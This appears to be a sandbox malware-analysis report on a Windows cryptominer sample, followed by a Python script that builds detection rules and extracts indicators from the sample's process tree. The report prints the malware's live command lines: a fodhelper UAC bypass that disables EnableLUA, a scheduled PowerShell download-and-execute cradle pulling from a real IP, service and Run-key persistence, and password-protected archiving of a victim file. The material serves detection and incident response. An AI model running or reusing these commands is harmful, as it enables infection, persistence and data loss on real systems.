
Windows Analysis Report
jxatBamQnK

Overview

General Information

Sample Name: jxatBamQnK (renamed file extension from none to exe)
Analysis ID: 683425
MD5: c44c67fbbd78af44e4e75787e636e1fe
SHA1: a72928ef28c93893cf510937e6c4c7336f21c50c
SHA256: 55bc3c6946fe78077bea015b9e93414db807495f353a88b2aeb6d9315cb31322
Tags: CoinMiner, exe, trojan

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Schedule system process
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Yara detected Powershell download and execute
Snort IDS alert for network traffic
Sigma detected: Powershell Download and Execute IEX
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Found strings related to Crypto-Mining
Uses cmd line tools excessively to alter registry or file data
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Powershell drops PE file
Drops script or batch files to the startup folder
Uses schtasks.exe or at.exe to add and modify task schedules
Creates an autostart registry key pointing to binary in C:\Windows
Suspicious powershell command line found
Machine Learning detection for dropped file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Creates a start menu entry (Start Menu\Programs\Startup)
Uses reg.exe to modify the Windows registry
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Enables debug privileges
Installs a raw input device (often for capturing keystrokes)
Uses Microsoft's Enhanced Cryptographic Provider

Process Tree

  • System is w10x64
  • jxatBamQnK.exe (PID: 6352 cmdline: "C:\Users\user\Desktop\jxatBamQnK.exe" MD5: C44C67FBBD78AF44E4E75787E636E1FE)
    • cmd.exe (PID: 6392 cmdline: cmd.exe /C fodhelper.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • fodhelper.exe (PID: 6436 cmdline: fodhelper.exe MD5: 1D1F9E564472A9698F1BE3F9FEB9864B)
        • reg.exe (PID: 6484 cmdline: "reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f MD5: E3DACF0B31841FA02064B4457D44B357)
          • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6816 cmdline: schtasks /create /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 /sc MINUTE /MO 1 /tr "powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\\\""http://212.87.212.218/doanlowd.txt\\\"")" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 6836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Conhost.exe (PID: 944 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6828 cmdline: schtasks /run /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • conhost.exe (PID: 6852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 6844 cmdline: sc create msupdate binpath= C:\Windows\Temp\C:\Windows\Temp\daemon.exe MD5: D79784553A9410D15E04766AAAB77CD6)
      • conhost.exe (PID: 6904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 6912 cmdline: sc description msupdate "Just For Test" MD5: D79784553A9410D15E04766AAAB77CD6)
      • conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • sc.exe (PID: 7028 cmdline: sc config msupdate start= auto MD5: D79784553A9410D15E04766AAAB77CD6)
      • conhost.exe (PID: 7052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • net.exe (PID: 7060 cmdline: net start msupdate MD5: 15534275EDAABC58159DD0F8607A71E5)
      • conhost.exe (PID: 3244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • net1.exe (PID: 5716 cmdline: C:\Windows\system32\net1 start msupdate MD5: AF569DE92AB6C1B9C681AF1E799F9983)
    • reg.exe (PID: 7164 cmdline: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • conhost.exe (PID: 5028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • reg.exe (PID: 3852 cmdline: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • reg.exe (PID: 4040 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f MD5: E3DACF0B31841FA02064B4457D44B357)
      • conhost.exe (PID: 4712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WMIC.exe (PID: 6424 cmdline: wmic process get executablepath MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • findstr.exe (PID: 4584 cmdline: findstr encrypt.exe MD5: BCC8F29B929DABF5489C9BE6587FF66D)
      • conhost.exe (PID: 2952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Conhost.exe (PID: 1152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • encrypt.exe (PID: 6660 cmdline: C:\Windows\Temp\encrypt.exe MD5: 9996CC802C43F6FFE4065A514585C209)
      • cmd.exe (PID: 1880 cmdline: cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====.rar1" "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
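The process tree above is the evidence behind most of the listed signatures: cmd.exe launches fodhelper.exe (an auto-elevating Windows binary), and reg.exe runs as a child of fodhelper.exe rather than of cmd.exe, setting EnableLUA to 0; schtasks registers a task that runs a hidden PowerShell IEX DownloadString cradle every minute; sc.exe creates a service and reg.exe writes three Run values, all pointing at C:\Windows\Temp\daemon.exe (note the doubled path in the sc create binpath, exactly as captured); wmic and findstr check whether encrypt.exe is already running; and encrypt.exe drives rar.exe with a password (-hp) and delete-after-archive (-df) against a file under C:\System Volume Information whose name is base32-encoded. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it runs command-line detection rules over those command lines (copied from the tree, conhost.exe entries omitted) and extracts the indicators a responder would block or hunt for. The rule names and regexes are this example's own labels, not Sigma rule identifiers.

```python
"""Command-line detection rules and IOC extraction for the process tree above.

Added example, not part of the Joe Sandbox report. SAMPLE_CMDLINES is copied
from the tree (conhost.exe entries omitted); rule names and regexes are this
example's own labels, not Sigma rule identifiers.
"""
from __future__ import annotations

import base64
import re

# Constructed sample input: child-process command lines from the report.
SAMPLE_CMDLINES = [
    r'"C:\Users\user\Desktop\jxatBamQnK.exe"',
    r'cmd.exe /C fodhelper.exe',
    r'fodhelper.exe',
    r'"reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',
    r'schtasks /create /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456 /sc MINUTE /MO 1 /tr "powershell.exe -nop -w hidden -exec bypass -command iex(New-Object Net.WebClient).DownloadString(\\\""http://212.87.212.218/doanlowd.txt\\\"")"',
    r'schtasks /run /tn MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456',
    r'sc create msupdate binpath= C:\Windows\Temp\C:\Windows\Temp\daemon.exe',  # doubled path as captured
    r'sc description msupdate "Just For Test"',
    r'sc config msupdate start= auto',
    r'net start msupdate',
    r'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f',
    r'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f',
    r'reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v registryKeyName /t REG_SZ /d C:\Windows\Temp\daemon.exe /f',
    r'wmic process get executablepath',
    r'findstr encrypt.exe',
    r'C:\Windows\Temp\encrypt.exe',
    r'cmd /C start /b C:/Windows/Temp/rar.exe a -df -m0 -mt10 -ep -hpMInGZq50krQkY8LdhH8K9M8YsZLqe1bCDBYaLyDr5qtHaQxoCmumisNfQzcqvnICm1VD0JjlTxWou0w8I3457uWAfn14FpE8VDJ9 "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ====.rar1" "C:/System Volume Information/ORZGCY3LNFXGOLTMN5TQ===="',
]

# (name, pattern): one rule per behaviour visible in the tree. Names are ours.
RULES = [
    ("fodhelper_from_cmd",  # auto-elevate binary launched from cmd.exe
     re.compile(r'\bcmd(?:\.exe)?\s+/c\s+fodhelper\.exe', re.I)),
    ("uac_disabled_via_reg",  # EnableLUA set to 0 under Policies\System
     re.compile(r'reg(?:\.exe)?"?\s+add\b.*policies\\system\b.*\benablelua\b.*\s/d\s+0\b', re.I)),
    ("schtasks_powershell_download_cradle",  # task action is an IEX DownloadString cradle
     re.compile(r'schtasks\b.*/create\b.*powershell.*(?:\biex\b|invoke-expression).*downloadstring', re.I)),
    ("service_binpath_in_temp",  # sc create with the service binary under \Temp\
     re.compile(r'\bsc(?:\.exe)?\s+create\b.*binpath=\s*\S*\\temp\\', re.I)),
    ("run_key_to_temp_binary",  # HKCU/HKLM Run value pointing under \Temp\
     re.compile(r'reg(?:\.exe)?"?\s+add\b.*\\currentversion\\run\b.*\s/d\s+\S*\\temp\\', re.I)),
    ("wmic_process_discovery",  # process listing, here used to look for encrypt.exe
     re.compile(r'\bwmic(?:\.exe)?\s+process\s+get\b', re.I)),
    ("rar_password_archive_delete_source",  # rar a ... with -hp<password> and -df
     re.compile(r'\brar(?:\.exe)?\s+a\b(?=.*\s-df\b)(?=.*\s-hp\S)', re.I)),
]

URL_RE = re.compile(r'https?://[^\s"\'\\)]+', re.I)
TASK_RE = re.compile(r'schtasks\b.*?/tn\s+(\S+)', re.I)
SVC_RE = re.compile(r'\bsc(?:\.exe)?\s+create\s+(\S+)', re.I)
RUN_VALUE_RE = re.compile(r'\\currentversion\\run\b.*?\s/d\s+(\S+)', re.I)
BINPATH_RE = re.compile(r'binpath=\s*(\S+)', re.I)
# Standalone upper-case base32 tokens (letters A-Z, digits 2-7, optional padding).
B32_TOKEN_RE = re.compile(r'(?<![A-Za-z0-9])[A-Z2-7]{8,}={0,6}(?![A-Za-z0-9])')


def match_rules(cmdline: str) -> list:
    """Names of every rule whose pattern matches one command line."""
    return [name for name, pat in RULES if pat.search(cmdline)]


def scan(cmdlines) -> dict:
    """Map each rule name to the command lines that triggered it."""
    hits: dict = {}
    for cmd in cmdlines:
        for name in match_rules(cmd):
            hits.setdefault(name, []).append(cmd)
    return hits


def decode_base32_tokens(cmdline: str) -> set:
    """Decode base32 tokens (e.g. the archived file name) to printable ASCII."""
    names = set()
    for tok in B32_TOKEN_RE.findall(cmdline):
        if len(tok) % 8:  # valid base32 is always padded to a multiple of 8
            continue
        try:
            text = base64.b32decode(tok).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if text.isprintable():
            names.add(text)
    return names


def extract_iocs(cmdlines) -> dict:
    """Collect URLs, task/service names, autostart binaries and decoded names."""
    iocs = {"urls": set(), "task_names": set(), "service_names": set(),
            "autostart_binaries": set(), "decoded_targets": set()}
    for cmd in cmdlines:
        iocs["urls"].update(URL_RE.findall(cmd))
        iocs["task_names"].update(TASK_RE.findall(cmd))
        iocs["service_names"].update(SVC_RE.findall(cmd))
        iocs["autostart_binaries"].update(RUN_VALUE_RE.findall(cmd))
        iocs["autostart_binaries"].update(BINPATH_RE.findall(cmd))
        iocs["decoded_targets"].update(decode_base32_tokens(cmd))
    return iocs


if __name__ == "__main__":
    for name, lines in scan(SAMPLE_CMDLINES).items():
        print(f"[{name}] {len(lines)} hit(s)")
    for kind, values in extract_iocs(SAMPLE_CMDLINES).items():
        print(kind, sorted(values))
```

Run stand-alone, the scan fires seven rules (the three Run-key writes count as three hits of one rule), and the IOC pass returns the download URL, the task name MicrosoftEdgeUpdateTaskMachineCore1d78ccbc12c9456, the service name msupdate, both daemon.exe paths, and the decoded archive target tracking.log: the rar command is run against C:\System Volume Information\tracking.log with a long password and -df, which is the behaviour behind the "Modifies existing user documents" signature. Each regex maps directly onto a Sigma process_creation rule keyed on CommandLine if you want to deploy it in a SIEM; the task name and service name are the first things to check for on other hosts, since the one-minute task re-fetches the cradle even if daemon.exe is removed.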